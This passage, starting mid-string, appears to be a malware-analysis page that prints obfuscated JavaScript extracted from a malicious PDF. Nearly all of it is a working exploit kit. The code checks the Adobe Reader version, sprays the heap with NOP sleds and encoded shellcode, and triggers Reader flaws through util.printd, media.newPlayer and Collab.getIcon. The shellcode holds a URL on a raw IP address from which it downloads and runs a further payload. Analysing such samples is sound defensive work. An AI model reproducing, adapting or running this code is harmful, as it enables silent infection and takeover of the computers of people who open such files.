7%u7224%u6765%uC773%u2444%u7604%u3372%uC732%u2444%u2008%u732D%u5320%uF868%u0000%uFF00%u0C56%uE88B%uC933%uC751%u1D44%u7700%u6270%uC774%u1D44%u2E05%u6C64%uC66C%u1D44%u0009%u8A59%u04C1%u8830%u1D44%u4104%u6A51%u6A00%u5300%u6A57%uFF00%u1456%uC085%u1675%u006A%uFF53%u0456%u006A%uEB83%u530C%u56FF%u8304%u0CC3%u02EB%u13EB%u8047%u003F%uFA75%u8047%u003F%uC475%u006A%uFE6A%u56FF%uE808%uFE9C%uFFFF%u4E8E%uEC0E%uFE98%u0E8A%u6F89%uBD01%uCA33%u5B8A%uC61B%u7946%u1A36%u702F%u7468%u7074%u2F3A%u392F%u2E31%u3232%u2E38%u3331%u2E33%u3635%u642F%u676E%u3932%u3930%u3131%u642F%u3162%u3235%u3433%u3839%u6664%u3937%u3536%u3461%u6363%u3864%u6261%u3463%u3333%u3739%u3666%u2F64%u3764%u702E%u7068%u663F%u673D%u0000';var _2o='%u8366%uFCE4%u85FC%u75E4%uE934%u335F%u64C0%u408B%u8B30%u0C40%u708B%u561C%u768B%u3308%u66DB%u5E8B%u033C%u3374%u812C%u15EE%uFF10%uB8FF%u408B%uC330%u3946%u7506%u87FB%u2434%uE485%u5175%uEBE9%u514C%u8B56%u3C75%u748B%u7835%uF503%u8B56%u2076%uF503%uC933%u4149%uADFC%uC503%uDB33%uBE0F%u3810%u74F2%uC108%u0DCB%uDA03%uEB40%u3BF1%u751F%u5EE6%u5E8B%u0324%u66DD%u0C8B%u8D4B%uEC46%u54FF%u0C24%uD88B%uDD03%u048B%u038B%uABC5%u595E%uEBC3%uAD53%u688B%u8020%u0C7D%u7433%u9603%uF3EB%u688B%u8B08%u6AF7%u5905%u98E8%uFFFF%uE2FF%uE8F9%u0000%u0000%u5058%u406A%uFF68%u0000%u5000%uC083%u5019%u8B55%u8BEC%u105E%uC383%uFF05%u68E3%u6E6F%u0000%u7568%u6C72%u546D%u16FF%uC483%u8B08%uE8E8%uFF61%uFFFF%u02EB%u72EB%uEC81%u0104%u0000%u5C8D%u0C24%u04C7%u7224%u6765%uC773%u2444%u7604%u3372%uC732%u2444%u2008%u732D%u5320%uF868%u0000%uFF00%u0C56%uE88B%uC933%uC751%u1D44%u7700%u6270%uC774%u1D44%u2E05%u6C64%uC66C%u1D44%u0009%u8A59%u04C1%u8830%u1D44%u4104%u6A51%u6A00%u5300%u6A57%uFF00%u1456%uC085%u1675%u006A%uFF53%u0456%u006A%uEB83%u530C%u56FF%u8304%u0CC3%u02EB%u13EB%u8047%u003F%uFA75%u8047%u003F%uC475%u006A%uFE6A%u56FF%uE808%uFE9C%uFFFF%u4E8E%uEC0E%uFE98%u0E8A%u6F89%uBD01%uCA33%u5B8A%uC61B%u7946%u1A36%u702F%u7468%u7074%u2F3A%u392F%u2E31%u3232%u2E38%u3331%u2E33%u3635%u642F%u676E%u3932%u3930%u3131%u642F%u3162%u3235%u3433%u3839%u6664%u3937%u3536%u3461%u6363%u3864%u6261%u3463%u3333%u3739%u3666%u2F64%u3864%u702E%u7068%u663F%u6E3D%u0000';function _3o(){var _4o=app.viewerVersion.toString();_4o=_4o.replace('.','');while(_4o.length<4){_4o+='0';}_4o=parseInt(_4o,10);return _4o;}function _5o(){function _6o(){var _7o='p@111111111111111111111111 : yyyy111';util.printd(_7o,new Date());}var _8o=12000;_9o=new Array();var _1o0='%u9090%u9090';var _1o1=_2o;_1o0=unescape(_1o0);_1o1=unescape(_1o1);while(_1o0.length<=0x8000){_1o0+=_1o0;}_1o0=_1o0.substr(0,0x8000-_1o1.length); for(_1o2=0;_1o2<_8o;_1o2++){_9o[_1o2]=_1o0+_1o1;}if(_8o){_6o();_6o();try{this.media.newPlayer(null);}catch(e){}_6o();}}function _1o3(){var _1o4=unescape(_1o);_1o5=unescape('%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090')+_1o4;_1o6=unescape('%u9090%u9090');_1o7=10;_1o8=_1o7+_1o5.length;while(_1o6.length<_1o8)_1o6+=_1o6;_1o9=_1o6.substring(0,_1o8);_2o2=_1o6.substring(0,_1o6.length-_1o8);while(_2o2.length+_1o8<0x40000)_2o2=_2o2+_2o2+_1o9;_2o0=new Array();for(_2o1=0;_2o1<180;_2o1++)_2o0[_2o1]=_2o2+_1o5;var _2o3=4012;var _2o4=Array(_2o3);for(_2o1=0;_2o1<_2o3;_2o1++){_2o4[_2o1]=unescape(' ');}Collab.getIcon(_2o4+'_N.bundle');}var _4o=_3o();if(((_4o>8950)&&(_4o<9050))\|\|((_4o>=8000)&&(_4o<=8102))){_1o3();}else if((_4o>=9100)\|\|(_4o<=9200)\|\|(_4o>=8103)\|\|(_4o<=8107)){_5o();}

Open this report in the interactive analyzer, or submit your own file for analysis.